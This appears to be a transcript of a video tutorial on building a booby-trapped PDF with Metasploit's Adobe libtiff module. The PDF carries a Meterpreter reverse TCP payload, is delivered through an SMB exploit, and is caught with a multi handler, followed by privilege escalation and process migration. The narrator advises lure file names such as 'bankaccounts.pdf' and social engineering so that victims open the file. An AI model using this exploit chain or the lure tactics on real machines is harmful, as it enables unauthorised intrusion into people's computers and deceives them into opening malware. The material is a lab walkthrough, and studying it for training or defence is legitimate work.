Alright, so in this video we're going to switch things up just a little bit. We are going to be going back to MSF payload and setting up services and all that sort of thing. But I'm going to take you through a couple other exploits first. And with these, we can even use these to set up services or whatever, but we'll get to that point sooner or later. The most common exploits when someone is executing something, say if it's on a Windows 7, Windows XP, whatever it is, would be something like Adobe, like opening up a PDF or something like that. Another really common exploit is Java. And Java is a really nice exploit because it is what we called a multi-exploit. It's not geared specifically for Windows or Linux or Mac. Any system that has Java, we can essentially exploit that. And we're going to go ahead and take a look at that in the next video. This video we're going to talk about Adobe Acrobat. And one thing that I'm going to probably do is I'm going to put up a folder so you guys can download it, and it will contain all the software, at least that I can provide or that I'm allowed to provide to you. I can throw up a link or something like that, and you guys would be able to download the same software that I have, the same versions and everything. Because later on down the road, if someone's watching this video and let's say that there's been a patch or something like that, then you wouldn't be able to follow along with the video. The good thing with Adobe and Java is that there is a reported vulnerability like every few months, and so then they'll patch it, and they play this cat and mouse game back and forth. So Adobe and Java very well known for having vulnerabilities and people exploiting them. So it's extremely common, and there's many different Adobe exploits that we can use and Java exploits that we can use that are already available. Some of them may require us to be on the internet. For example, like if we're using Firefox or if we're using Internet Explorer, some of the Java stuff, it may want to go out and before it launches a Java application, it might want to check for updates or something like that. And sometimes that can get in the way of testing when we're doing our host-only adapter. So it just depends, but we will get there. So let's go ahead and get started with the Adobe Acrobat exploit. The Adobe that I'm going to be exploiting is Adobe Reader. The version's 9, and they have released updates since then. However, I'm just going to start with Adobe Acrobat 9, and then we'll see if there's any other Adobe exploits that we can use. But I'm very familiar with this one, so I'm sure it's going to work. It will work with Windows 7, Windows XP, doesn't matter, as long as your version of Adobe is Adobe 9. And so this gets into, you got to think, it's not only the operating system that we can exploit. Sometimes, if we can't exploit Windows 7 or if we can't exploit Windows 8, if there's nothing out there to exploit, then we need to exploit applications or craft something that when they open it, it will call back to us. And so that's what we're mainly going to focus on now. So instead of trying to find that needle in a haystack, trying to find a zero-day exploit or something like that, we can focus on known applications that have weaknesses, exploit those, and get the same access, an interpreter session on a Windows 7, XP, or Windows 8. So just for this demonstration, because we're still learning everything, I'm going to be using Windows XP, the same one that I've been using, Windows XP Service Pack 2 actually, but it doesn't matter. If you have Service Pack 3, that's okay. So I know I'm yapping a lot, so we'll get right into it. The exploit that we want to use, let's just look at the info first. So I'm going to type in info, exploit, Windows, file format, and Adobe _libtiff. And let's pull up that information and see what it looks like here. So this module exploits integer overflow vulnerability in Adobe Reader and Adobe Acrobat Professional versions 8, 8.2, 9, and 9.3. So if you can grab one of those versions, we should be able to exploit it. And I will provide you with the, I believe I have a 9.3 version that we can go ahead and exploit. So let's go ahead and dig into this. We're going to use exploit Windows file format Adobe _libtiff, and we're going to go ahead and show options, and all that is required is the file name. So we basically need to think of a PDF that we would need to craft. Now, this particular PDF, there's nothing going to be inside of it. Basically, when they open it, it's going to look like a real PDF. It is a PDF. Adobe Reader will open it, but there's nothing in the PDF except our payload. So that's not going to be like a real document that they can view. Not in this particular case, anyway. So one thing that we need to do is set file name to the PDF name that we want. So let's think about, I don't know, something that would kind of make somebody curious. Obviously, if you were creative, if you were trying to tailor your exploit and your payload to a particular individual or a company, then you may want to, be crafty a little bit in what you name your file. Maybe something that would catch their eye. So all I'm going to do is I'm going to choose bank accounts. I don't know, something like that, something that might catch someone's eye. So set file name bankaccounts.pdf. Go ahead and hit enter. Let's go ahead and show options one more time. And so now we need to set our payload so that the payload can connect back to us and either give us a shell, interpreter, whatever kind of payload that we want to throw in there. So we are going to need a payload. So set payload Windows. Obviously, we're going to use the interpreter because, again, one of my favorites, reverse TCP, show options, show options, and now we need to set our lhost. My lhost is already set, but obviously you would need to just set lhost and then type in your IP address. Now we're going to go on port 4444. If you want to change, that is up to you, but we are going to need to start up a handler after this. So just remember what port that we put it on. I'm going to just use the default. And so I'm going to go ahead and type in exploit. What this is going to do is create that PDF. We can see that it is in root.msf4 local bankaccounts.pdf. So we need to remember that because we're going to upload this to the system. So what I'm going to do now is I'm going to use exploit. Now this is just my method of getting it on the system, just like in the other videos. Technically we wouldn't need to do the exploit again. They would just click on the PDF, and as long as our handler was set up, it would connect back to us. But we need to get this onto the system. So use exploit. We're going to use Windows SMB MS08 show options. And it looks like I've already got my payload set up. If you need to set up your payload, just set payload, Windows, interpreter, reverse TCP, show options, and go ahead and set your lhost. And make sure that is your local IP, your attacker machine, and then make sure that that L port, obviously 4444. So let's go ahead and exploit this. And this is just to get this file on the system. Alright, so now that we're on there, we're going to go ahead and use the upload command. And if you remember, it's in /root.msf4/local/bankaccounts.pdf. And I use tab there and it helped me out. So, and we're going to go ahead and load this on C:// and we'll just put it there. We could throw it on the desktop, and that might make it appear, and they would be like, "Ooh, I wonder what this is," and click on it. But for now, we're just going to put it on the C drive, and it uploaded it. So sweet. I'm going to go ahead and now exit. So the file should be on the system now, and now we need to set up that reverse handler. So use exploit multi handler. Show options. Alright, and it shows that I have a payload in there. Again, you can set the payload if you like. If you don't set the payload, it should still work. It should run on the default port, which is 4444 on your local host. But if you want to go ahead and plug that in, very simple. Just set your payload again. Set payload, Windows, interpreter, reverse TCP. We're going to go ahead and show options again. Set our lhost. 192.101, and show options. Our default port is 4444, so that should work unless you specified when we made that PDF if you wanted to put it on a different port. So right now we're good to go. Now we need to run our handler. So it started the payload handler. It's running on 4444, or it's listening on 4444. And so now what we need to do is we need to go back to our XP machine, and you'll notice that I have a bank accounts PDF, and it is in the C drive. So, start menu, my computer, C drive, and bank accounts. Now you'll notice that I have Adobe Reader 9 installed. So obviously we're going to need this to be installed. If you don't have it installed, then your computer's not going to know how to open up a PDF. So make sure that we get that piece of software installed. Again, I'll provide possibly a download link so that you can get the same software that I'm using so that it works just fine. So let's see what happens when we go ahead and just double click. Now you need to think, we really need to pay attention to our handler on the Metasploit console, because what's going to happen is when they execute this, it's going to open up Adobe Reader, and then once it gets into the PDF, our payload is going to launch. But because they're not going to see anything, the Adobe a lot of times is not going to respond. It's just hanging there. There's nothing that's opening, and so they're going to either do a Control-Alt-Delete and probably try and close it themselves, or they're just going to keep clicking X. It's going to say it's not responding, and eventually the task will probably be killed. If we cannot migrate fast enough, then we're going to lose our interpreter session, which means that we obviously need to migrate. So this is just a way to get onto the system. So let's double-click bank accounts, where you should notice that Adobe 9 should be loading up here in just a second. Well, we can already see that it's sending the stage, and we have our interpreter session that's open. So it didn't open Adobe Reader 9. You will notice if it's your first time installing it, it will probably pop up with like an agreement or something and actually try to display the Adobe. So mine didn't open, at least I can't see it. But again, when we looked at our other exploits that we've done, it's running in the background. And so when we move away from that, it will probably just close out. But if this person is curious, again, if they close it before we can migrate, then our interpreter session will be lost. So really quickly, same old stuff. I'm going to get UID. I'm not the system, so I'm going to do a get system. Once I grab those system privileges, I'm going to do a PS to list the processes, and I'm going to choose an NT Authority system. You see there's one that says network service. We don't want that one. So I'm going to migrate to 912. So migrate to 912. And once we hit that 912, then we don't really care. We can see that Adobe Acrobat 32. I'm not sure if that's because of if Adobe's just running in the background or what, but let's do another PS. And we can see that Adobe Acrobat has now closed. So it ran in the background, and we need to obviously, like I said, migrate away from that process as fast as we can. That's just my tip. I mean, you don't have to do that, but it makes more sense for me to do that. Now, even though if they're suspicious at this point because they couldn't load it, now they might try to execute it several times to try and open it, but you know, however you want to craft it, whatever story you want to give, whatever it is, you know, it's just social engineering or however crafty you want to be. The main thing is it doesn't matter. They can delete that PDF. They can close the processes. The only thing that's going to kick us off at this point is if they shut down the computer. So we're in pretty good hands. We were able to use that to get onto the system, and now we can do whatever we want. So anyways, I know that's a little lengthy video, but that is just one example for Adobe. I'm going to go ahead and exit out of our interpreter session, and let's look at something else. Let's go ahead and look up use exploit Windows file format Adobe. Now there's a lot of Adobe exploits, so I'm just going to type in Adobe and hit tab, and it gave me an underscore, so let me hit tab again, and we can see that it displayed a couple different things here. Adobe collect email info, cool type, you know, whatever. There's a flash player, you know, there's a get icon, a bunch of different things. There's even Adobe Illustrator. So obviously you would want to just kind of look those up if you're interested and see what do they do. You can look at the info. We can do an info exploit Windows file format, that sort of thing, and try and do that. Now our Adobe libtiff, we can do a search Adobe libtiff, and there we go. It's in exploit Windows file format and then our Adobe. I don't know why it's not up here, but I don't see it. Let's search for it again. Let's see, info, exploit, Windows, file format, Adobe. I'm going to hit tab on there. For whatever reason, I don't know where it is. Interesting. Let's search Adobe and see what pops up here. So obviously there's a bunch of things that popped up. I'm going to minimize this XP machine. And we can see exploit Windows local, Windows file format. So this will give us a better idea of, there's our libtiff right there. And we can see that there are some that have an excellent rating. And you also want to pay attention to the date. Like this one was in 2010. The one that we just used was also in 2010, but we're using an older version of Adobe. We can see that this one is 2013, so that's more recent. Another one, well, it's actually duplicate. But so you would also want to keep an eye on the dates, and that would give you kind of an idea of what's more recent as opposed to what's probably older and probably patched. But anyhow, you can, if you're interested in more Adobe stuff, look up this sort of thing. You can look up on Rapid7's website, on the main Metasploit website, and it probably will give you some documentation. Of course, I know I'm doing a lot of talking, but you can do an info and just type in, for example, this great one for 2013, info. We can look up what it says about it, Windows local Adobe _ sandbox, and let's look at that. And it basically will tell you, exploits a vulnerability on Adobe Reader 10 sandbox. The vulnerability is due blah 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 blah. So module has been tested successfully on Adobe Reader 10, 10.1.4 over Windows 7 Service Pack 1. So if you want to do a little bit more research, you can just use that info command and it will tell you. Even down here it tells us the CVE, so you can look up that sort of thing. So anyhow, guys, I'm going to go ahead and end the video. We've done a lot of talking, a lot of stuff about Adobe, but I just wanted to show you there's another possibility of trying to be creative and actually gaining access on the system. So hope you enjoyed the video. See you in the next one.